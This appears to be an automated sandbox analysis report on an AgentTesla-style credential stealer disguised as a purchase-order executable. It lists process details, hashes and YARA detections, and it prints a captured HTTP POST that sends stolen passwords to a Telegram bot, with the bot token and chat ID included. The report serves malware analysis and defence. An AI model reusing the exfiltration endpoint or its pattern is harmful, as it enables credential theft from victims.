                                                          | Apr 26, 2024 07:39:59.481059074 CEST | 443 | 49699 | 149.154.167.220 | 192.168.2.6 |
                                                          | Apr 26, 2024 07:39:59.481255054 CEST | 49699 | 443 | 192.168.2.6 | 149.154.167.220 |
                                                          | Apr 26, 2024 07:39:59.487315893 CEST | 49699 | 443 | 192.168.2.6 | 149.154.167.220 |
                                                          | Timestamp | Source Port | Dest Port | Source IP | Dest IP |
                                                          | Apr 26, 2024 07:39:58.134238005 CEST | 57284 | 53 | 192.168.2.6 | 1.1.1.1 |
                                                          | Apr 26, 2024 07:39:58.259990931 CEST | 53 | 57284 | 1.1.1.1 | 192.168.2.6 |
                                                          | Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
                                                          | Apr 26, 2024 07:39:58.134238005 CEST | 192.168.2.6 | 1.1.1.1 | 0x7150 | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false |
                                                          | Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
                                                          | Apr 26, 2024 07:39:58.259990931 CEST | 1.1.1.1 | 192.168.2.6 | 0x7150 | No error (0) | api.telegram.org |  | 149.154.167.220 | A (IP address) | IN (0x0001) | false |
                                                          • api.telegram.org
                                                          | Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
                                                          | 0 | 192.168.2.6 | 49699 | 149.154.167.220 | 443 | 5868 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe |
                                                          | Timestamp | Bytes transferred | Direction | Data |
                                                          | 2024-04-26 05:39:58 UTC | 260 | OUT | POST /bot7017233680:AAEfWTUjfiK5hxLLRkmgitv57SQZuFap4nQ/sendDocument HTTP/1.1 |
                                                          Content-Type: multipart/form-data; boundary=---------------------------8dc65c412473d6c
                                                          Host: api.telegram.org
                                                          Content-Length: 924
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          | 2024-04-26 05:39:59 UTC | 924 | OUT | Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 36 35 63 34 31 32 34 37 33 64 36 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 34 36 39 30 39 30 36 37 38 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 36 35 63 34 31 32 34 37 33 64 36 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 50 57 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 34 2f 32 36 2f 32 30 32 34 20 30 37 3a 33 39 3a 35 37 0a 55 73 65 72 |
                                                          Data Ascii: -----------------------------8dc65c412473d6cContent-Disposition: form-data; name="chat_id"1469090678-----------------------------8dc65c412473d6cContent-Disposition: form-data; name="caption"New PW Recovered!Time: 04/26/2024 07:39:57User
                                                          | 2024-04-26 05:39:59 UTC | 25 | IN | HTTP/1.1 100 Continue |
                                                          | 2024-04-26 05:39:59 UTC | 402 | IN | HTTP/1.1 400 Bad Request |
                                                          Server: nginx/1.18.0
                                                          Date: Fri, 26 Apr 2024 05:39:59 GMT
                                                          Content-Type: application/json
                                                          Content-Length: 56
                                                          Connection: close
                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                          Access-Control-Allow-Origin: *
                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                          {"ok":false,"error_code":400,"description":"Logged out"}
                                                          Target ID:0
                                                          Start time:07:39:54
                                                          Start date:26/04/2024
                                                          Path:C:\Users\user\Desktop\PO-inv-CQV20(92315).exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Users\user\Desktop\PO-inv-CQV20(92315).exe"
                                                          Imagebase:0x23344f60000
                                                          File size:1'012'108 bytes
                                                          MD5 hash:4E62C4B92779D99998CD908A0966BF7D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.2147294596.00000233470CB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2148520958.0000023356C97000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.2148520958.0000023356C97000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.2148520958.0000023356C97000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          Reputation:low
                                                          Has exited:true

                                                          Target ID:1
                                                          Start time:07:39:54
                                                          Start date:26/04/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff66e660000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:3
                                                          Start time:07:39:56
                                                          Start date:26/04/2024
                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
                                                          Imagebase:0x700000
                                                          File size:47'584 bytes
                                                          MD5 hash:94C8E57A80DFCA2482DEDB87B93D4FD9
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.3307185247.0000000002AFA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.3307185247.0000000002ADE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.3304934889.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.3304934889.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000002.3304934889.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.3307185247.0000000002A91000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.3307185247.0000000002A91000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000002.3307185247.0000000002A91000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          Reputation:moderate
                                                          Has exited:false

                                                          Target ID:4
                                                          Start time:07:39:56
                                                          Start date:26/04/2024
                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
                                                          Imagebase:0xa80000
                                                          File size:47'584 bytes
                                                          MD5 hash:94C8E57A80DFCA2482DEDB87B93D4FD9
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:moderate
                                                          Has exited:true

                                                          Target ID:7
                                                          Start time:07:39:56
                                                          Start date:26/04/2024
                                                          Path:C:\Windows\System32\WerFault.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\WerFault.exe -u -p 5040 -s 1080
                                                          Imagebase:0x7ff6a4ca0000
                                                          File size:570'736 bytes
                                                          MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true


                                                            Execution Graph

                                                            Execution Coverage:12.8%
                                                            Dynamic/Decrypted Code Coverage:100%
                                                            Signature Coverage:0%
                                                            Total number of Nodes:36
                                                            Total number of Limit Nodes:1
                                                            execution_graph: graph rendering (node layout not recoverable as text); the graph's nodes call FreeConsole, VirtualProtect and LoadLibraryA.

                                                            Control-flow Graph

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2151235986.00007FFD34970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34970000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ffd34970000_PO-inv-CQV20(92315).jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: A$JW9:$vBN_
                                                            • API String ID: 0-714564257
                                                            • Opcode ID: ab902b41bccda5ba303df533a3d882c7be86abc66a9ac298cc70ecb75b635cb4
                                                            • Instruction ID: 52eb67be77243345b12db746835916ef70f2be67d7a7bd51decc955d964f7d55
                                                            • Opcode Fuzzy Hash: ab902b41bccda5ba303df533a3d882c7be86abc66a9ac298cc70ecb75b635cb4
                                                            • Instruction Fuzzy Hash: 6B422672A0D7C54FEB56DB288CA65A47FE0EF57300B0941FED589CB297D92CA806C391
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2150884061.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ffd34890000_PO-inv-CQV20(92315).jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: _w4$fish
                                                            • API String ID: 0-1957416594
                                                            • Opcode ID: 6de5db7e093588f1367c7435c53d6412606bc3851a1aaefc74eb458a8e948ced
                                                            • Instruction ID: eff5b9b50482b49185a1efed27c7154640e198f599aeaac706a7f6ebe6486d54
                                                            • Opcode Fuzzy Hash: 6de5db7e093588f1367c7435c53d6412606bc3851a1aaefc74eb458a8e948ced
                                                            • Instruction Fuzzy Hash: BBC14931B1CE490FE75DEB6898B51BA77E1EF97710B04017ED58BC3293DE28A8029781
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2150884061.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ffd34890000_PO-inv-CQV20(92315).jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: {x4
                                                            • API String ID: 0-3047784844
                                                            • Opcode ID: 5781eedfeeb62b739f9b76b3a2c1f34a890d5056d1cb20519e46dd32de7215d4
                                                            • Instruction ID: ede51514c0b9a5fcd4a6b9590b388889052bd114bf7f260f1055f94e143316b1
                                                            • Opcode Fuzzy Hash: 5781eedfeeb62b739f9b76b3a2c1f34a890d5056d1cb20519e46dd32de7215d4
                                                            • Instruction Fuzzy Hash: 35728D2071894A4FEB98FBBC80A977E76D2EF9A301B6441B9E40DC73D3DD68AC418351
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2151235986.00007FFD34970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34970000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ffd34970000_PO-inv-CQV20(92315).jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: A
                                                            • API String ID: 0-3554254475
                                                            • Opcode ID: ed6ff4ebe8af9b8a935909ac72c44142423da291fb3a8b4f1fae31bc015bb6de
                                                            • Instruction ID: bfeab3b99e9aa80ca05837423a22d3f2b69e3375106051156c40b9d7630bd3c3
                                                            • Opcode Fuzzy Hash: ed6ff4ebe8af9b8a935909ac72c44142423da291fb3a8b4f1fae31bc015bb6de
                                                            • Instruction Fuzzy Hash: E662487290D6864FEB56DB288CA55A87FE0FF93300F0945FED189CB197D92CA806C791
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2150884061.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ffd34890000_PO-inv-CQV20(92315).jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: d
                                                            • API String ID: 0-2564639436
                                                            • Opcode ID: e795d61e89cff555b05a6f70e675eeb261c4911db530846e36bea8e0b1eadfc2
                                                            • Instruction ID: 2ac8d3c299f84610294e9f273878251a11915fd51eb9d3cf42dd29dd53efc04a
                                                            • Opcode Fuzzy Hash: e795d61e89cff555b05a6f70e675eeb261c4911db530846e36bea8e0b1eadfc2
                                                            • Instruction Fuzzy Hash: 87224531B1CE4A0FE759DF2894E15B17BD1EF96314B1442BAD98EC7197EE28F8428780
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2150884061.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ffd34890000_PO-inv-CQV20(92315).jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c9a7bb7381143636c02f901997e546eac0675ab9016fafb1f82ffcb6c3ccfcb6
                                                            • Instruction ID: 46ca56c76114a5bd756789e824eb4b8a54b482db994d683556cb76d6763e5700
                                                            • Opcode Fuzzy Hash: c9a7bb7381143636c02f901997e546eac0675ab9016fafb1f82ffcb6c3ccfcb6
                                                            • Instruction Fuzzy Hash: C8C2D331B09A598FDBE8DB18C4A56B977E1FF5A300F1401BAD14EC72A2DE78AC41DB50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2150884061.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ffd34890000_PO-inv-CQV20(92315).jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f7cd57fa968431bf998e328c76442bf48792f6adf6bf5f43479884e976d9af1d
                                                            • Instruction ID: f47daa089f33d713f8608a63402ef15b1acb89a182767fe18e230294d37b706a
                                                            • Opcode Fuzzy Hash: f7cd57fa968431bf998e328c76442bf48792f6adf6bf5f43479884e976d9af1d
                                                            • Instruction Fuzzy Hash: 6D727631B0DB4A4FE399DB28C4A15B177E1FF97310B0446BED58AC7292DE28E846C791
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2150884061.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ffd34890000_PO-inv-CQV20(92315).jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3724615b21c7fc589ab6b9011d1594468f3b7b269bad73e7bd422e0282d4d256
                                                            • Instruction ID: ecfea1e96d80bc153632644914878181edc0fb223284dae3fc1aed270393f9ee
                                                            • Opcode Fuzzy Hash: 3724615b21c7fc589ab6b9011d1594468f3b7b269bad73e7bd422e0282d4d256
                                                            • Instruction Fuzzy Hash: 81724B30A1EAC54FE7E9D71C88A65B53BD0EF4B300F0405BDD68DCB9A2D95CAC0697A1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2150884061.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ffd34890000_PO-inv-CQV20(92315).jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 937ca6be0f2346e52d218b072ff4ef030dcc9d6fa4c8380ffa37751ed2ae09d9
                                                            • Instruction ID: 35073fd13f3a410848780f1e463e175a074ea8795eac2ef7db7482c5420192e1
                                                            • Opcode Fuzzy Hash: 937ca6be0f2346e52d218b072ff4ef030dcc9d6fa4c8380ffa37751ed2ae09d9
                                                            • Instruction Fuzzy Hash: D152B630B0CA094FDB68EB2CD4A56797BE1FF5A305B14017EE54EC7292DE28BC429785
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2150884061.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ffd34890000_PO-inv-CQV20(92315).jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6c497edcbeb1a4cd2619f07229e44c280cb2513f51b34978834292c406a20273
                                                            • Instruction ID: a96a5cd32f42ee43ae28ec954199b341ce001ff77e3c85ea1800da0c46e85378
                                                            • Opcode Fuzzy Hash: 6c497edcbeb1a4cd2619f07229e44c280cb2513f51b34978834292c406a20273
                                                            • Instruction Fuzzy Hash: FF120732B0DE464FE7A9DB2884A69753FD2FF96311B0401BED58EC71D2DD2DA8069381
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2150884061.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ffd34890000_PO-inv-CQV20(92315).jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0cb308d3d8196a43272b8c03fc60198e96c7fb7271534f6de8bd62c18d447646
                                                            • Instruction ID: 52c154d2ac1572de6d4b8344ee34b2909c4e6c33426a5adde10283e5599f60a9
                                                            • Opcode Fuzzy Hash: 0cb308d3d8196a43272b8c03fc60198e96c7fb7271534f6de8bd62c18d447646
                                                            • Instruction Fuzzy Hash: 88E10031B0CE468BEB6CAB2884A15B677D1EF96314B2445BDD54BC75C2DE2CF8429780
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2150884061.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ffd34890000_PO-inv-CQV20(92315).jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: caea250a91450b44b705403023f52d1f4adfaa894bf02c426f27d0afecd7dcb3
                                                            • Instruction ID: 641e3a29039cad31e3b90c1ef1d3bc19f75c68c6900b3e8142aee1d5801bed3c
                                                            • Opcode Fuzzy Hash: caea250a91450b44b705403023f52d1f4adfaa894bf02c426f27d0afecd7dcb3
                                                            • Instruction Fuzzy Hash: 68E12A31B1CD4A4FE7A8DB1CC4A66A97BD1FF9A310F0405B9D64DCB692CE2CAC468741
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2150884061.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ffd34890000_PO-inv-CQV20(92315).jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b3c3a56222e20bff21b1121ea0306bbac620ad78cf3f6faf4064926f4bd470c0
                                                            • Instruction ID: b04bae7e9e328c1ec61fce47685d4fd4a095fd873278b3fb3a00a0c31dc27601
                                                            • Opcode Fuzzy Hash: b3c3a56222e20bff21b1121ea0306bbac620ad78cf3f6faf4064926f4bd470c0
                                                            • Instruction Fuzzy Hash: 20D14931A0CF864FE31DCB2984E51B57BE2FFD6301B14867ED5C6C7295DA28E4468781
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2150884061.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ffd34890000_PO-inv-CQV20(92315).jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 454d9fce1ccd7c1feaefb12632485e6135c9c6f3fdd12a199c916c95503020f8
                                                            • Instruction ID: 37dfc2f73921f8141914f9d14ad1ea152c074e4415edc1b1dde746e8c1afadf2
                                                            • Opcode Fuzzy Hash: 454d9fce1ccd7c1feaefb12632485e6135c9c6f3fdd12a199c916c95503020f8
                                                            • Instruction Fuzzy Hash: 7FD17831B1EA468FE7A8DB28C4A45B977E1FF82300F10417ED64AC7192DE69A846C790
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2150884061.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ffd34890000_PO-inv-CQV20(92315).jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 79d5694c813c25b97e67bb4e006d0f6a1b5a3c23a6c7c92e90fe8d6b5fb8a238
                                                            • Instruction ID: c949cbf6c9b9069264cf399dd97e0460555004917ca223981447f4f143fe41b1
                                                            • Opcode Fuzzy Hash: 79d5694c813c25b97e67bb4e006d0f6a1b5a3c23a6c7c92e90fe8d6b5fb8a238
                                                            • Instruction Fuzzy Hash: B1519626A8EBE60FE713477488A10957FB0AE1362031E55EBC5D4CF0E3D64D684AE762
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2150884061.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ffd34890000_PO-inv-CQV20(92315).jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 32f7532234f3b47337753e5a4daa60a4fe13e582d64f4780f89f13378446b0aa
                                                            • Instruction ID: 7e63eb0830008cafef1a82936695a75c33aa5937bcb3cbf9aceca1fb3d4fa999
                                                            • Opcode Fuzzy Hash: 32f7532234f3b47337753e5a4daa60a4fe13e582d64f4780f89f13378446b0aa
                                                            • Instruction Fuzzy Hash: 72419D3260D78A1FD71E9A748C621B57BA5EB43320B0582BFD087CB1E7DD1C684683D1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2150884061.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ffd34890000_PO-inv-CQV20(92315).jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 8411ff85c1ddb09822fa517693dbaf5886babb989bcbc25e060748e2842d526b
                                                            • Instruction ID: d07e97532dec393c16f97b418019fab844768944f42e9c20ae4caa747f696b6b
                                                            • Opcode Fuzzy Hash: 8411ff85c1ddb09822fa517693dbaf5886babb989bcbc25e060748e2842d526b
                                                            • Instruction Fuzzy Hash: 3941683160D78A0FD72E9B7488651B53BA5EB83310B1582BFD18BCB1E7DD6CA80683D1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph (rendered node/edge list omitted; legend: Executed / Not Executed)
                                                            • Function entry: 7ffd34892780-7ffd348927cf
                                                            • Imported API call: LoadLibraryA (block 7ffd3489291f-7ffd34892982)
                                                            • Internal call: 7ffd348929da (block 7ffd3489298a-7ffd348929be)
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2150884061.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ffd34890000_PO-inv-CQV20(92315).jbxd
                                                            Similarity
                                                            • API ID: LibraryLoad
                                                            • String ID: $
                                                            • API String ID: 1029625771-3993045852
                                                            • Opcode ID: 1f1b086caa8e5f62a76c26172bfb2306998724981cf38cdd1b9955bde27e936f
                                                            • Instruction ID: b6aa7a8626c6c4945177236671aab1700c3621c6429783a928fa1bf5362c67fc
                                                            • Opcode Fuzzy Hash: 1f1b086caa8e5f62a76c26172bfb2306998724981cf38cdd1b9955bde27e936f
                                                            • Instruction Fuzzy Hash: 2A91E431608A4D4FEB98EF28D8967F57BE1FF5A310F00417EE90DC7292DA39A8418781
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph (rendered node/edge list omitted; legend: Executed / Not Executed)
                                                            • Function entry: 7ffd34890e8f-7ffd34890e91
                                                            • Imported API call: LoadLibraryA (block 7ffd3489291f-7ffd34892982)
                                                            • Internal call: 7ffd348929da (block 7ffd3489298a-7ffd348929be)
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2150884061.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ffd34890000_PO-inv-CQV20(92315).jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 726c3a1d003576a8a2fa169940b13d9e79b5735dcca5ed75bf774f0acd03156c
                                                            • Instruction ID: c99220c7311f02d039df78257204a2beafa44c9194bf4f6170f2aa0eee9dbdae
                                                            • Opcode Fuzzy Hash: 726c3a1d003576a8a2fa169940b13d9e79b5735dcca5ed75bf774f0acd03156c
                                                            • Instruction Fuzzy Hash: EC61B530608A4D8FEB98EF58D8557F97BE1FF55311F00413EE94EC7292DA78A8458B81
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph (rendered node/edge list omitted; legend: Executed / Not Executed)
                                                            • Function entry: 7ffd348997fd-7ffd3489980e
                                                            • Imported API call: VirtualProtect (block 7ffd348a883b-7ffd348a887f)
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2150884061.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ffd34890000_PO-inv-CQV20(92315).jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: be8713909922bef9eb716e0e6045d31899e238d3634e07e9e19e27b713f1412c
                                                            • Instruction ID: 49fb485bf592f327a98339a5ece82e70103f08415d43194decdbcb00924104fb
                                                            • Opcode Fuzzy Hash: be8713909922bef9eb716e0e6045d31899e238d3634e07e9e19e27b713f1412c
                                                            • Instruction Fuzzy Hash: 39412732A0CA189FD714EB9CE8A66FA7BE4EF52321F08413FD149D3153DE3464468B90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph (rendered node/edge list omitted; legend: Executed / Not Executed)
                                                            • Function entry: 7ffd3489045d-7ffd34890474
                                                            • Imported API call: FreeConsole (block 7ffd34890aca-7ffd34890afc)
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2150884061.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ffd34890000_PO-inv-CQV20(92315).jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
